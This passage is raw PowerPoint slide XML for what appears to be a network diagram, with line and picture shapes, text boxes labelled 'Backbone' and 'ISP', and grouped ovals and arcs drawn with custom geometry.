            <a:ext cx="373957" cy="66076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7" name="Line 1441">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EBA8240-B235-6044-B22B-28D58D6EBCD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5248258" y="2345157"/>
            <a:ext cx="562520" cy="32959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8" name="Line 1442">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27A8826B-231E-A444-B803-EA30B65331F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5810778" y="2674747"/>
            <a:ext cx="1121872" cy="5546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9" name="Line 1443">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CAAE98D-64C7-974B-8313-34C9CA53C47E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6276641" y="2289698"/>
            <a:ext cx="514984" cy="16637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0" name="Line 1444">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B18A53D-89E8-DD48-BF04-6005FE94DA5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5622216" y="3116841"/>
            <a:ext cx="1028383" cy="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1" name="Line 1445">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{424E1F8A-C11F-244A-88C6-8F841D4CEF48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6698135" y="2730207"/>
            <a:ext cx="280469" cy="38663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2" name="Line 1446">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D5FA6D2-969D-B84E-863B-8ACC3E78A3C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6837577" y="2456077"/>
            <a:ext cx="141027" cy="27413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3" name="Line 1447">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E284F333-4874-6940-A86B-93A3B1F428DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="6782117" y="2971061"/>
            <a:ext cx="456355" cy="22976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6984" name="Picture 1448">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9F208CD-3453-9F40-A1DB-7164DA11994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503" y="1974369"/>
            <a:ext cx="364450" cy="26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6985" name="Line 1449">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90635B56-43FE-FB45-BB42-558498B55B24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3210507" y="2636717"/>
            <a:ext cx="608473"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6986" name="Picture 1450">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D829B0D-D676-E840-960C-C3DE6B3D21E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586" y="2503614"/>
            <a:ext cx="364450"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87" name="Picture 1451">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62174FAF-9CBC-904C-BD1C-7942185B0C3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934" y="2264345"/>
            <a:ext cx="364450"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88" name="Picture 1452">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0623628-30DA-7347-87DE-DA7DE2DA48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910" y="2978984"/>
            <a:ext cx="367619"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89" name="Picture 1453">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5DB1828-28E1-044A-AA73-84991DA08DD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005" y="3012260"/>
            <a:ext cx="392972"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0" name="Picture 1454">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0026029C-714C-ED41-A895-D0890CDA780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263" y="2565412"/>
            <a:ext cx="391388" cy="25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1" name="Picture 1455">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFE2805F-1C39-F848-9070-BB17290239B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43" y="2193039"/>
            <a:ext cx="391388"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2" name="Picture 1456">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{875F6DC5-BBFC-F84B-A17E-813E0F1054E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631" y="2340404"/>
            <a:ext cx="392972" cy="25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3" name="Picture 1457">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D36E9522-45E5-3F40-85BF-EDF11EEF478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344" y="3056628"/>
            <a:ext cx="392972" cy="2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4" name="Picture 1458">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B286F648-9E43-3E49-A59D-ED954BF8FC3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981" y="2652563"/>
            <a:ext cx="391388"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6995" name="Text Box 1459">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22D96201-E6F8-0840-8608-EF355DCCBF74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5443159" y="1554460"/>
            <a:ext cx="1400756" cy="39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algn="l" defTabSz="915988">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr algn="l" defTabSz="915988">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="915988" algn="l" defTabSz="915988">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1373188" algn="l" defTabSz="915988">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1831975" algn="l" defTabSz="915988">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2289175" defTabSz="915988" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2746375" defTabSz="915988" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3203575" defTabSz="915988" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3660775" defTabSz="9159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996" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Backbone</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66996" name="Text Box 1460">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05195D28-16FD-454B-9EE5-DF53CD38492A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4725352" y="1752530"/>
            <a:ext cx="592628" cy="39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algn="l" defTabSz="915988">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr algn="l" defTabSz="915988">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="915988" algn="l" defTabSz="915988">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1373188" algn="l" defTabSz="915988">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1831975" algn="l" defTabSz="915988">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2289175" defTabSz="915988" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2746375" defTabSz="915988" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3203575" defTabSz="915988" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3660775" defTabSz="9159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996" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ISP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="66997" name="Picture 1461">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91E8A695-8CA3-EF4C-A0FA-45F5DAAD7EE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098" y="2650979"/>
            <a:ext cx="366035" cy="2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8" name="Picture 1462">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D746743-A252-3F40-AEEB-AE189C2C6F7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529" y="2362588"/>
            <a:ext cx="364450" cy="25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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="66999" name="Group 1463">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0104DD90-0D21-BD49-8BD1-2177FDF95AC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7390590" y="1828589"/>
            <a:ext cx="1800067" cy="1624180"/>
            <a:chOff x="1358" y="1894"/>
            <a:chExt cx="2981" cy="1793"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67000" name="Oval 1464">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA365A66-DB48-1246-A378-F42C11648D44}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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1" name="Oval 1465">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC48637C-EBD2-7448-8E30-0E9365C22CF6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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2" name="Oval 1466">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0A5B449-FA15-464C-AF42-779EF45F94ED}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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3" name="Oval 1467">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0646ABDD-B07F-BE49-A64B-761FF088AAC6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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4" name="Oval 1468">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E23481B-B68B-7346-9270-453C798E76BC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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5" name="Oval 1469">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4186B783-00D1-B34D-8996-AB2C52682AF6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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6" name="Oval 1470">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D2C3265-4E3A-0D43-BB80-79A76B28F77C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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7" name="Oval 1471">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{028C0D01-4B5C-2044-B37A-0D30CDEA737B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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8" name="Oval 1472">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FA3C069-62C3-6640-B304-78466CCD7F63}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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7009" name="Group 1473">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{556D5264-117D-DF45-B734-A22F5BA16BB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7390590" y="1828589"/>
            <a:ext cx="1800067" cy="1652702"/>
            <a:chOff x="1358" y="1886"/>
            <a:chExt cx="2989" cy="1810"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67010" name="Arc 1474">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A30808EF-5F2D-1E46-9DA6-9A124F54E19B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2404" y="1886"/>
              <a:ext cx="1247" cy="375"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 20666 0 0"/>
                <a:gd name="G1" fmla="+- 21600 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 0 w 40985"/>
                <a:gd name="T1" fmla="*/ 15316 h 21600"/>
                <a:gd name="T2" fmla="*/ 40985 w 40985"/>
                <a:gd name="T3" fmla="*/ 14272 h 21600"/>
                <a:gd name="T4" fmla="*/ 20666 w 40985"/>
                <a:gd name="T5" fmla="*/ 21600 h 21600"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="40985" h="21600" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="15316"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2766" y="6218"/>
                    <a:pt x="11157" y="0"/>
                    <a:pt x="20666" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29769" y="0"/>
                    <a:pt x="37896" y="5708"/>
                    <a:pt x="40984" y="14272"/>
                  </a:cubicBezTo>
                </a:path>
                <a:path w="40985" h="21600" stroke="0" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="15316"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2766" y="6218"/>
                    <a:pt x="11157" y="0"/>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1" name="Arc 1475">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15CA8C77-4C8B-7B43-8AB7-964B09669296}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2412" y="1893"/>
              <a:ext cx="1232" cy="368"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 20651 0 0"/>
                <a:gd name="G1" fmla="+- 21600 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 0 w 40951"/>
                <a:gd name="T1" fmla="*/ 15269 h 21600"/>
                <a:gd name="T2" fmla="*/ 40951 w 40951"/>
                <a:gd name="T3" fmla="*/ 14220 h 21600"/>
                <a:gd name="T4" fmla="*/ 20651 w 40951"/>
                <a:gd name="T5" fmla="*/ 21600 h 21600"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="40951" h="21600" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="-1" y="15268"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2781" y="6195"/>
                    <a:pt x="11160" y="0"/>
                    <a:pt x="20651" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29734" y="0"/>
                    <a:pt x="37847" y="5683"/>
                    <a:pt x="40951" y="14219"/>
                  </a:cubicBezTo>
                </a:path>
                <a:path w="40951" h="21600" stroke="0" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="-1" y="15268"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2781" y="6195"/>
                    <a:pt x="11160" y="0"/>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sz="1797" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67012" name="Arc 1476">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D22D5B7-967A-4342-82F5-2BF0FCA45146}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1662" y="2081"/>
              <a:ext cx="766" cy="446"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 21600 0 0"/>
                <a:gd name="G1" fmla="+- 21600 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 392 w 33007"/>
                <a:gd name="T1" fmla="*/ 25698 h 25698"/>
                <a:gd name="T2" fmla="*/ 33007 w 33007"/>
                <a:gd name="T3" fmla="*/ 3258 h 25698"/>
                <a:gd name="T4" fmla="*/ 21600 w 33007"/>
                <a:gd name="T5" fmla="*/ 21600 h 25698"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="33007" h="25698" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="392" y="25697"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="24347"/>
                    <a:pt x="0" y="22975"/>
                    <a:pt x="0" y="21600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="9670"/>
                    <a:pt x="9670" y="0"/>
                    <a:pt x="21600" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25631" y="0"/>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0"/>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3" name="Arc 1477">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF61233A-47FE-E64F-B0AD-AC226C7A73F7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1669" y="2088"/>
              <a:ext cx="755" cy="438"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 21600 0 0"/>
                <a:gd name="G1" fmla="+- 21600 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 396 w 32968"/>
                <a:gd name="T1" fmla="*/ 25717 h 25717"/>
                <a:gd name="T2" fmla="*/ 32968 w 32968"/>
                <a:gd name="T3" fmla="*/ 3233 h 25717"/>
                <a:gd name="T4" fmla="*/ 21600 w 32968"/>
                <a:gd name="T5" fmla="*/ 21600 h 25717"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="32968" h="25717" fill="none" extrusionOk="0">
                  <a:moveTo>
